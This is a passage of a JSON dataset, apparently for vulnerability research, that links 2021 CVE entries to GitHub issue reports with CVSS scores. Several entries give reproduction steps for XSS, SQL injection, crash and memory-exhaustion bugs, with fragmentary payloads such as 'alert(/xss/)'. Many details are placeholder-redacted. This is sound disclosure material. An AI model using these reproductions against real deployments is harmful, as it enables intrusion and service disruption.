represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
  68233. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  68234. "severity": "MEDIUM",
  68235. "baseScore": 6.5,
  68236. "impactScore": 3.6,
  68237. "exploitabilityScore": 2.8
  68238. },
  68239. {
  68240. "CVE_ID": "CVE-2021-34539",
  68241. "Issue_Url_old": "https://github.com/CubeCoders/AMP/issues/464",
  68242. "Issue_Url_new": "https://github.com/cubecoders/amp/issues/464",
  68243. "Repo_new": "cubecoders/amp",
  68244. "Issue_Created_At": "2021-06-10T09:46:57Z",
  68245. "description": "Security: Insufficient validation on Java Version setting.. This was originally reported by Joel Frederick Lewis We are awaiting a CVE number for this issue. Bug Report System Information Windows, Linux PATHTAG B2 Development I confirm: [x] that I have searched for an existing bug report for this issue. [x] that I am using the latest available version of AMP. [x] that my operating system is up to date. Symptoms The APITAG Version' setting within AMP doesn't validate its setting in the way you'd expect for a potentially sensitive setting. Reproduction Alter the path to Java by using the Inspect Element tool in a browser for a given setting. Notes Because of the authentication and permissions requirements (users with this combination would reasonably be expected to have a high level of access to the host) this is regarded as a low risk, but potentially high impact issue. Instances running inside Docker aren't affected in the same way since they would not affect the host system.",
  68246. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  68247. "severity": "HIGH",
  68248. "baseScore": 7.2,
  68249. "impactScore": 5.9,
  68250. "exploitabilityScore": 1.2
  68251. },
  68252. {
  68253. "CVE_ID": "CVE-2021-34555",
  68254. "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDMARC/issues/179",
  68255. "Issue_Url_new": "https://github.com/trusteddomainproject/opendmarc/issues/179",
  68256. "Repo_new": "trusteddomainproject/opendmarc",
  68257. "Issue_Created_At": "2021-06-08T09:47:15Z",
  68258. "description": "APITAG NUMBERTAG segfault several times on two VMs, APITAG NUMBERTAG Hi, yesterday and today APITAG has crashed for segfault half a dozen times on two virtual machines, one of them APITAG another APITAG both up to date and have APITAG version NUMBERTAG Until yesterday APITAG has worked fine. Last dmesg info was ERRORTAG Red Hat Abrtd service was running, there is coredump and other files saved by it. Is there some additional information you would need to investigate the issue? The package version is opendmarc NUMBERTAG APITAG on APITAG and opendmarc NUMBERTAG APITAG on APITAG",
  68259. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68260. "severity": "HIGH",
  68261. "baseScore": 7.5,
  68262. "impactScore": 3.6,
  68263. "exploitabilityScore": 3.9
  68264. },
  68265. {
  68266. "CVE_ID": "CVE-2021-34801",
  68267. "Issue_Url_old": "https://github.com/xCss/Valine/issues/366",
  68268. "Issue_Url_new": "https://github.com/xcss/valine/issues/366",
  68269. "Repo_new": "xcss/valine",
  68270. "Issue_Created_At": "2021-06-16T04:11:40Z",
  68271. "description": "Found a fatal bug that can kill the comment system. \u5982\u679c\u60a8\u60f3\u62a5\u544a\u9519\u8bef\uff0c\u8bf7\u63d0\u4f9b\u4ee5\u4e0b\u4fe1\u606f If you want to report a bug, please provide the following information: \u53ef\u590d\u73b0\u95ee\u9898\u7684\u6b65\u9aa4 The steps to reproduce. The latest version of valine is APITAG first look at the effect of normal page loading comments: FILETAG When the commented user UA is incomplete\uff0csuch as\uff1a APITAG FILETAG This will cause the entire comment system of the current page to be damaged and the comments cannot be loaded normally FILETAG \u53ef\u590d\u73b0\u95ee\u9898\u7684\u7f51\u9875\u5730\u5740 FILETAG This website uses the latest version of valine, the comment cannot be loaded normally APITAG Valine NUMBERTAG PATHTAG Browser: APITAG \u603b\u7684\u6765\u8bf4\u5c31\u662f \u5982\u679c\u6709\u7528\u6237\u6076\u610f\u4fee\u6539 UA NUMBERTAG leancloud \u4ece\u91cc\u5230\u5916\u6392\u67e5\u4e86\u4e00\u904d \u624d\u53d1\u73b0\u4e86\u8fd9\u4e2a BUG\uff0c\u5e0c\u671b\u4f5c\u8005\u5927\u5927\u540e\u9762\u53ef\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5c34\u5c2c\u7684\u95ee\u9898",
  68272. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  68273. "severity": "MEDIUM",
  68274. "baseScore": 5.3,
  68275. "impactScore": 1.4,
  68276. "exploitabilityScore": 3.9
  68277. },
  68278. {
  68279. "CVE_ID": "CVE-2021-3496",
  68280. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/33",
  68281. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/33",
  68282. "Repo_new": "matthias-wandel/jhead",
  68283. "Issue_Created_At": "2021-04-13T03:00:34Z",
  68284. "description": "FILETAG Verification steps\uff1a APITAG the source code of jhead Edit file makefile CODETAG APITAG the jhead APITAG NUMBERTAG run jhead APITAG asan info ERRORTAG Tanks",
  68285. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68286. "severity": "HIGH",
  68287. "baseScore": 7.8,
  68288. "impactScore": 5.9,
  68289. "exploitabilityScore": 1.8
  68290. },
  68291. {
  68292. "CVE_ID": "CVE-2021-3502",
  68293. "Issue_Url_old": "https://github.com/lathiat/avahi/issues/338",
  68294. "Issue_Url_new": "https://github.com/lathiat/avahi/issues/338",
  68295. "Repo_new": "lathiat/avahi",
  68296. "Issue_Created_At": "2021-04-26T17:05:33Z",
  68297. "description": "eachable assertion in APITAG when trying to resolve badly formatted hostnames ( CVETAG ). Hi An issue was reported in Debian as CVETAG which got CVETAG assigned. Quoting the report: CODETAG",
  68298. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  68299. "severity": "MEDIUM",
  68300. "baseScore": 5.5,
  68301. "impactScore": 3.6,
  68302. "exploitabilityScore": 1.8
  68303. },
  68304. {
  68305. "CVE_ID": "CVE-2021-35041",
  68306. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951",
  68307. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/1951",
  68308. "Repo_new": "fisco-bcos/fisco-bcos",
  68309. "Issue_Created_At": "2021-06-15T12:05:29Z",
  68310. "description": "The node may have a bug when dealing with unformatted packet and lead to a crash. Describe the bug A malicious node can send a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume the memory sustainably, as the flowing figure shows: FILETAG After NUMBERTAG seconds, over NUMBERTAG MB memory has been consumed. If I continue sending the packet, the node will consume all the memory. At last it be killed by the OS. In order to analyze the reason for this bug, I try to debug the code of the node. Here is what I found: First, I found that in the file APITAG , at line NUMBERTAG in the function decode : CODETAG the variable size is NUMBERTAG and the variable APITAG is a very big number under my packet. So the function will return APITAG whose value is NUMBERTAG The variable which accepts the return value is result in APITAG at line NUMBERTAG in the function APITAG : APITAG and the program will enter into a if else cluse: CODETAG Because the value of result is NUMBERTAG so here the program will call the function APITAG recursively. If I delete this call, the problem will not occur anymore. APITAG So I think the reason maybe the developers forget to release certain memory before the return statement if the packet is not decoded correctly! To Reproduce Steps to reproduce the behavior NUMBERTAG Construct a P2P packet which claims to have a big length (set a big value for variable APITAG NUMBERTAG Continuously send the packet to a running node NUMBERTAG The node will consume the memory continuously and crash. Expected behavior By handling the abnormal packets correctly, the memory cost will not sustainably increase and the node will not crash. Screenshots I have give the screenshots of the memory usage of the node in the description part. Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG Additional context None!",
  68311. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68312. "severity": "HIGH",
  68313. "baseScore": 7.5,
  68314. "impactScore": 3.6,
  68315. "exploitabilityScore": 3.9
  68316. },
  68317. {
  68318. "CVE_ID": "CVE-2021-3505",
  68319. "Issue_Url_old": "https://github.com/stefanberger/libtpms/issues/183",
  68320. "Issue_Url_new": "https://github.com/stefanberger/libtpms/issues/183",
  68321. "Repo_new": "stefanberger/libtpms",
  68322. "Issue_Created_At": "2021-02-17T11:08:16Z",
  68323. "description": "[libtpms NUMBERTAG APITAG creates prime numbers with NUMBERTAG zeros bits. Describe the bug When running APITAG on swtpm with libtpms NUMBERTAG to generate an RSA NUMBERTAG key, the modulus of the key always contains many zeros in its high bits. By extracting the prime factors from file holding the persistent TPM state, they always have NUMBERTAG bits set to zero. For example: Modulus CODETAG First prime number CODETAG Second prime number CODETAG APITAG the eight APITAG hexdigits after the NUMBERTAG first hexdigits of the prime numbers). This is due to a bug in function APITAG URLTAG The issue is that on NUMBERTAG bit systems, MASK is not APITAG but APITAG when APITAG is NUMBERTAG so only the NUMBERTAG lowest bits of APITAG are kept instead of the NUMBERTAG lowest bits. More precisely, in APITAG , the shift operand should have been APITAG . This bug is present in TCG specification ( APITAG section APITAG ). This specification was updated and the current version does not have this bug ( APITAG section APITAG ). This new version was implemented in April NUMBERTAG in APITAG (branch master ) but no release of libtpms includes the new version yet. Therefore I have three questions: Could APITAG be fixed in branch APITAG so that generating new RSA keys do not use prime numbers with many zeros, on NUMBERTAG bit systems? If no, could a comment be added which clearly state that this prime number generator generates prime numbers that have NUMBERTAG bits always set to zero and that the TCG already fixed this issue in a newer version of APITAG Platform Module Library Family NUMBERTAG Specification Part NUMBERTAG Routines Code\"? When will the next release of libtpms (version APITAG ?) occur? To Reproduce Steps to reproduce the behavior NUMBERTAG On Arch Linux on an NUMBERTAG system, install swtpm , APITAG and APITAG NUMBERTAG Launch swtpm in TPM2 mode and APITAG , for example with: CODETAG NUMBERTAG Generate a persistent RSA key on the software TPM, for example with: CODETAG NUMBERTAG Analyze the content of APITAG to retrieve the modulus and the prime numbers of the generated RSA key. Expected behavior APITAG should create an RSA key with prime numbers which really look random, instead of with NUMBERTAG bits always set to zero. Desktop (please complete the following information): OS: Arch Linux on an NUMBERTAG CPU NUMBERTAG bit system) Versions of relevant components libtpms NUMBERTAG swtpm NUMBERTAG",
  68324. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  68325. "severity": "MEDIUM",
  68326. "baseScore": 5.5,
  68327. "impactScore": 3.6,
  68328. "exploitabilityScore": 1.8
  68329. },
  68330. {
  68331. "CVE_ID": "CVE-2021-3508",
  68332. "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/17",
  68333. "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/17",
  68334. "Repo_new": "enferex/pdfresurrect",
  68335. "Issue_Created_At": "2021-04-16T08:58:58Z",
  68336. "description": "Infinite loop in function get_xref_linear_skipped in pdf.c. version NUMBERTAG b commit af NUMBERTAG OS: ubuntu NUMBERTAG CODETAG If found 'trailer' ,then look backwards for 'xref'. But if there isn't character 'x' , the function APITAG will go into an infinite loop. poc(zipped ): FILETAG To reproduct: ./pdfresurrect [poc]",
  68337. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68338. "severity": "MEDIUM",
  68339. "baseScore": 5.5,
  68340. "impactScore": 3.6,
  68341. "exploitabilityScore": 1.8
  68342. },
  68343. {
  68344. "CVE_ID": "CVE-2021-3514",
  68345. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4711",
  68346. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4711",
  68347. "Repo_new": "389ds/389-ds-base",
  68348. "Issue_Created_At": "2021-04-01T14:35:42Z",
  68349. "description": "SIGSEV with sync_repl. Issue Description When running a sync_repl client, it crashes current master APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG b NUMBERTAG abb (pc NUMBERTAG f2c NUMBERTAG c6c NUMBERTAG d bp NUMBERTAG f2be7fc3d NUMBERTAG sp NUMBERTAG f2be7fc3d NUMBERTAG T NUMBERTAG APITAG signal is caused by a READ memory access NUMBERTAG f2c NUMBERTAG c6c NUMBERTAG c in slapi_value_get_string PATHTAG NUMBERTAG f2c NUMBERTAG in sync_create_state_control PATHTAG NUMBERTAG f2c NUMBERTAG a NUMBERTAG f in sync_srch_refresh_pre_entry PATHTAG NUMBERTAG f2c NUMBERTAG bb NUMBERTAG in plugin_call_func PATHTAG NUMBERTAG f2c NUMBERTAG bb6fb6 in plugin_call_list PATHTAG NUMBERTAG f2c NUMBERTAG baf NUMBERTAG c in plugin_call_plugins PATHTAG NUMBERTAG f2c NUMBERTAG bf9a6a in send_ldap_search_entry_ext PATHTAG NUMBERTAG f2c NUMBERTAG bf NUMBERTAG e6 in send_ldap_search_entry PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG in send_entry PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG in iterate PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG b in send_results_ext PATHTAG NUMBERTAG f2c NUMBERTAG b7fffe in op_shared_search PATHTAG NUMBERTAG b1 in do_search PATHTAG NUMBERTAG c7 in connection_dispatch_operation PATHTAG NUMBERTAG a5f5 in connection_threadmain PATHTAG NUMBERTAG f2c NUMBERTAG b NUMBERTAG APITAG NUMBERTAG f2c NUMBERTAG de4e1 in start_thread APITAG NUMBERTAG f2c NUMBERTAG a2 in clone APITAG APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in slapi_value_get_string Thread T NUMBERTAG created by T0 here NUMBERTAG f2c NUMBERTAG de NUMBERTAG in pthread_create APITAG NUMBERTAG f2c NUMBERTAG a APITAG APITAG Package Version and Platform: Platform: fedora Steps to Reproduce Steps to reproduce the behavior NUMBERTAG run sync_repl suite NUMBERTAG start standalone NUMBERTAG launch: ldapsearch ... E sync=rp b 'cn=config' APITAG Expected results Should not crash",
  68350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  68351. "severity": "MEDIUM",
  68352. "baseScore": 6.5,
  68353. "impactScore": 3.6,
  68354. "exploitabilityScore": 2.8
  68355. },
  68356. {
  68357. "CVE_ID": "CVE-2021-35196",
  68358. "Issue_Url_old": "https://github.com/olivierkes/manuskript/issues/891",
  68359. "Issue_Url_new": "https://github.com/olivierkes/manuskript/issues/891",
  68360. "Repo_new": "olivierkes/manuskript",
  68361. "Issue_Created_At": "2021-06-17T17:52:17Z",
  68362. "description": "Possible security issue. Hi, do you have a process for reporting a possible security issue with Manuskript?",
  68363. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68364. "severity": "HIGH",
  68365. "baseScore": 7.8,
  68366. "impactScore": 5.9,
  68367. "exploitabilityScore": 1.8
  68368. },
  68369. {
  68370. "CVE_ID": "CVE-2021-35265",
  68371. "Issue_Url_old": "https://github.com/maxsite/cms/issues/414",
  68372. "Issue_Url_new": "https://github.com/maxsite/cms/issues/414",
  68373. "Repo_new": "maxsite/cms",
  68374. "Issue_Created_At": "2020-10-21T08:15:04Z",
  68375. "description": "Cross Site Scripting Vulnerability on URLTAG Although CMS has protection means But after testing, the protection is not comprehensive enough.. like this URLTAG url FILETAG",
  68376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68377. "severity": "MEDIUM",
  68378. "baseScore": 6.1,
  68379. "impactScore": 2.7,
  68380. "exploitabilityScore": 2.8
  68381. },
  68382. {
  68383. "CVE_ID": "CVE-2021-35283",
  68384. "Issue_Url_old": "https://github.com/atoms183/CMS/issues/1",
  68385. "Issue_Url_new": "https://github.com/atoms183/cms/issues/1",
  68386. "Repo_new": "atoms183/cms",
  68387. "Issue_Created_At": "2021-06-09T05:44:41Z",
  68388. "description": "product_ FILETAG SQL injection. product_ FILETAG There is SQL injection in line NUMBERTAG CODETAG Just submit the following post request APITAG FILETAG post : query=a",
  68389. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68390. "severity": "CRITICAL",
  68391. "baseScore": 9.8,
  68392. "impactScore": 5.9,
  68393. "exploitabilityScore": 3.9
  68394. },
  68395. {
  68396. "CVE_ID": "CVE-2021-35306",
  68397. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/615",
  68398. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/615",
  68399. "Repo_new": "axiomatic-systems/bento4",
  68400. "Issue_Created_At": "2021-06-10T13:16:05Z",
  68401. "description": "SEGV in mp NUMBERTAG aac. Hello, A SEGV has occurred when running program mp NUMBERTAG aac\uff0c System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Bento4 version NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of Bento4 APITAG APITAG NUMBERTAG run mp NUMBERTAG aac APITAG Output APITAG APITAG output ERRORTAG",
  68402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68403. "severity": "MEDIUM",
  68404. "baseScore": 6.5,
  68405. "impactScore": 3.6,
  68406. "exploitabilityScore": 2.8
  68407. },
  68408. {
  68409. "CVE_ID": "CVE-2021-35307",
  68410. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/616",
  68411. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/616",
  68412. "Repo_new": "axiomatic-systems/bento4",
  68413. "Issue_Created_At": "2021-06-10T14:10:25Z",
  68414. "description": "SEGV in mp NUMBERTAG aac. Hello, A SEGV has occurred when running program mp NUMBERTAG aac\uff0c System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Bento4 version NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of Bento4 APITAG APITAG NUMBERTAG run mp NUMBERTAG aac APITAG Output APITAG APITAG output ERRORTAG",
  68415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68416. "severity": "MEDIUM",
  68417. "baseScore": 6.5,
  68418. "impactScore": 3.6,
  68419. "exploitabilityScore": 2.8
  68420. },
  68421. {
  68422. "CVE_ID": "CVE-2021-35323",
  68423. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1327",
  68424. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1327",
  68425. "Repo_new": "bludit/bludit",
  68426. "Issue_Created_At": "2021-05-27T17:35:01Z",
  68427. "description": "cross site script (xss) . Describe your problem I found a cross site scripting attack on the login page URLTAG cross site scripting is a vulnerability that allows an attacker to send malicious code(usually in javascript form) to another user Because a browser cannot know if the script should be trusted or not, it will execute the script in user context allowing the attacker to access any cookies or sessions tokens retained by the browser. Steps to reproduce the problem NUMBERTAG open login page URLTAG NUMBERTAG enter the username place admin\"> APITAG and enter password NUMBERTAG trigger the malicious javascript code Bludit version bludit NUMBERTAG PHP version PHP NUMBERTAG",
  68428. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68429. "severity": "MEDIUM",
  68430. "baseScore": 6.1,
  68431. "impactScore": 2.7,
  68432. "exploitabilityScore": 2.8
  68433. },
  68434. {
  68435. "CVE_ID": "CVE-2021-35344",
  68436. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/432",
  68437. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/432",
  68438. "Repo_new": "justdan96/tsmuxer",
  68439. "Issue_Created_At": "2021-05-27T22:03:26Z",
  68440. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec As you can see on backtrace APITAG System info\uff1a APITAG To run APITAG after unzip: FILETAG APITAG Asan output: ERRORTAG",
  68441. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68442. "severity": "CRITICAL",
  68443. "baseScore": 9.8,
  68444. "impactScore": 5.9,
  68445. "exploitabilityScore": 3.9
  68446. },
  68447. {
  68448. "CVE_ID": "CVE-2021-35346",
  68449. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/436",
  68450. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/436",
  68451. "Repo_new": "justdan96/tsmuxer",
  68452. "Issue_Created_At": "2021-05-27T22:06:00Z",
  68453. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec As you can see on backtrace APITAG System info\uff1a APITAG To run APITAG after unzip: FILETAG APITAG Asan output: ERRORTAG",
  68454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68455. "severity": "CRITICAL",
  68456. "baseScore": 9.8,
  68457. "impactScore": 5.9,
  68458. "exploitabilityScore": 3.9
  68459. },
  68460. {
  68461. "CVE_ID": "CVE-2021-35358",
  68462. "Issue_Url_old": "https://github.com/dotCMS/core/issues/20540",
  68463. "Issue_Url_new": "https://github.com/dotcms/core/issues/20540",
  68464. "Repo_new": "dotcms/core",
  68465. "Issue_Created_At": "2021-06-15T01:52:32Z",
  68466. "description": "Store XSS in APITAG APITAG on APITAG Describe the bug Hi Team I found small a store xss in APITAG APITAG install: Docker: APITAG To Reproduce NUMBERTAG Login Admin panel NUMBERTAG Go to APITAG APITAG NUMBERTAG Click on APITAG new content NUMBERTAG Parameter: APITAG and APITAG NUMBERTAG Insert Payload Store XSS: \" APITAG foo / bar NUMBERTAG Click APITAG File' and BOOM XSS NUMBERTAG Save and refersh store XSS impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Win NUMBERTAG Browser Chrome: Version NUMBERTAG APITAG Build NUMBERTAG bit)",
  68467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  68468. "severity": "MEDIUM",
  68469. "baseScore": 4.8,
  68470. "impactScore": 2.7,
  68471. "exploitabilityScore": 1.7
  68472. },
  68473. {
  68474. "CVE_ID": "CVE-2021-35360",
  68475. "Issue_Url_old": "https://github.com/dotCMS/core/issues/20541",
  68476. "Issue_Url_new": "https://github.com/dotcms/core/issues/20541",
  68477. "Repo_new": "dotcms/core",
  68478. "Issue_Created_At": "2021-06-15T04:00:37Z",
  68479. "description": "Reflected XSS Vulnerability on Docker: APITAG Describe the bug Hi Team I found small reflected xss APITAG install: Docker: APITAG To Reproduce NUMBERTAG Login Admin panel NUMBERTAG uln link1: APITAG /c/containers NUMBERTAG uln link2: APITAG /c/links NUMBERTAG insert payload: \"> APITAG NUMBERTAG para: 'SEARCH NUMBERTAG Boom XSS impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots xss link1: FILETAG xss link2: FILETAG Desktop (please complete the following information): OS: Win NUMBERTAG Browser Chrome: Version NUMBERTAG APITAG Build NUMBERTAG bit)",
  68480. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  68481. "severity": "MEDIUM",
  68482. "baseScore": 4.8,
  68483. "impactScore": 2.7,
  68484. "exploitabilityScore": 1.7
  68485. },
  68486. {
  68487. "CVE_ID": "CVE-2021-35438",
  68488. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/3351",
  68489. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/3351",
  68490. "Repo_new": "phpipam/phpipam",
  68491. "Issue_Created_At": "2021-06-18T07:44:36Z",
  68492. "description": "XSS (reflected) in IP calculator. verison NUMBERTAG FILETAG PATHTAG / APITAG alert(/xss/) APITAG Input the POC to IP calculator box and Get an alert box",
  68493. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68494. "severity": "MEDIUM",
  68495. "baseScore": 6.1,
  68496. "impactScore": 2.7,
  68497. "exploitabilityScore": 2.8
  68498. },
  68499. {
  68500. "CVE_ID": "CVE-2021-35452",
  68501. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/298",
  68502. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/298",
  68503. "Repo_new": "strukturag/libde265",
  68504. "Issue_Created_At": "2021-06-22T14:49:43Z",
  68505. "description": "SEGV in slice.cc. Hello, A SEGV has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG without asan) APITAG Output ERRORTAG APITAG output ERRORTAG This issue will cause Denial of Service attacks",
  68506. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68507. "severity": "MEDIUM",
  68508. "baseScore": 6.5,
  68509. "impactScore": 3.6,
  68510. "exploitabilityScore": 2.8
  68511. },
  68512. {
  68513. "CVE_ID": "CVE-2021-35513",
  68514. "Issue_Url_old": "https://github.com/mermaid-js/mermaid/issues/2122",
  68515. "Issue_Url_new": "https://github.com/mermaid-js/mermaid/issues/2122",
  68516. "Repo_new": "mermaid-js/mermaid",
  68517. "Issue_Created_At": "2021-06-08T17:31:30Z",
  68518. "description": "Antiscript option should remove javascript urls . Antiscript option should remove javascript urls",
  68519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68520. "severity": "MEDIUM",
  68521. "baseScore": 6.1,
  68522. "impactScore": 2.7,
  68523. "exploitabilityScore": 2.8
  68524. },
  68525. {
  68526. "CVE_ID": "CVE-2021-3575",
  68527. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1347",
  68528. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1347",
  68529. "Repo_new": "uclouvain/openjpeg",
  68530. "Issue_Created_At": "2021-04-30T00:10:00Z",
  68531. "description": "Heap buffer overflow in APITAG in sycc NUMBERTAG to_rgb. Hi, I found a vulnerability in current master NUMBERTAG bda NUMBERTAG URLTAG , and I also reproduced it on latest released version FILETAG . Crash Summary A heap buffer overflow in APITAG in sycc NUMBERTAG to_rgb, it can lead to heap based buffer overflow via a crafted APITAG file when decompress it. Crash Analysis There is improper check of APITAG . URLTAG APITAG FILETAG To reproduce NUMBERTAG Ubuntu NUMBERTAG with clang NUMBERTAG CODETAG ASAN report: ERRORTAG",
  68532. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68533. "severity": "HIGH",
  68534. "baseScore": 7.8,
  68535. "impactScore": 5.9,
  68536. "exploitabilityScore": 1.8
  68537. },
  68538. {
  68539. "CVE_ID": "CVE-2021-3588",
  68540. "Issue_Url_old": "https://github.com/bluez/bluez/issues/70",
  68541. "Issue_Url_new": "https://github.com/bluez/bluez/issues/70",
  68542. "Repo_new": "bluez/bluez",
  68543. "Issue_Created_At": "2021-01-04T06:12:01Z",
  68544. "description": "Potential buffer out of bound read in gatt APITAG URLTAG ERRORTAG Both len and APITAG are unsigned and offset is an external input without validation. It seems like a malicious GATT client can cause out of bound read on memory locations after the given device_state::cli_feat pointer. Similar validation like below should be sufficient: URLTAG",
  68545. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  68546. "severity": "LOW",
  68547. "baseScore": 3.3,
  68548. "impactScore": 1.4,
  68549. "exploitabilityScore": 1.8
  68550. },
  68551. {
  68552. "CVE_ID": "CVE-2021-3596",
  68553. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/2624",
  68554. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/2624",
  68555. "Repo_new": "imagemagick/imagemagick",
  68556. "Issue_Created_At": "2020-09-25T05:56:46Z",
  68557. "description": "Null Pointer dereference caused by incomplete check of the return value from libxml2 in APITAG APITAG Prerequisites Y ] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported. Description APITAG There is a segmentation fault caused by the NPD in function APITAG APITAG in APITAG NUMBERTAG APITAG does not check the nullity of the pointer returned from libxml2 and dereference it directly. This directly leads to program crashes and segmentation fault. Steps to Reproduce APITAG NUMBERTAG To ensure reproduce, I use a low level privilege user to use up space in the /tmp folder first NUMBERTAG Run: ~~~~ magick convert poc ./test.ps ~~~~ FILETAG (unzip first) Here is the trace reported by ASAN: ~~~~ ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fec8c bp NUMBERTAG f NUMBERTAG sp NUMBERTAG ffd NUMBERTAG e NUMBERTAG c0 T NUMBERTAG fec8b in APITAG PATHTAG NUMBERTAG c8ba0c in APITAG PATHTAG NUMBERTAG dfbc1 in APITAG PATHTAG NUMBERTAG c8ba0c in APITAG PATHTAG NUMBERTAG c8ecbc in APITAG PATHTAG NUMBERTAG bfaef in APITAG PATHTAG NUMBERTAG fd NUMBERTAG in APITAG PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG efd NUMBERTAG fa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: 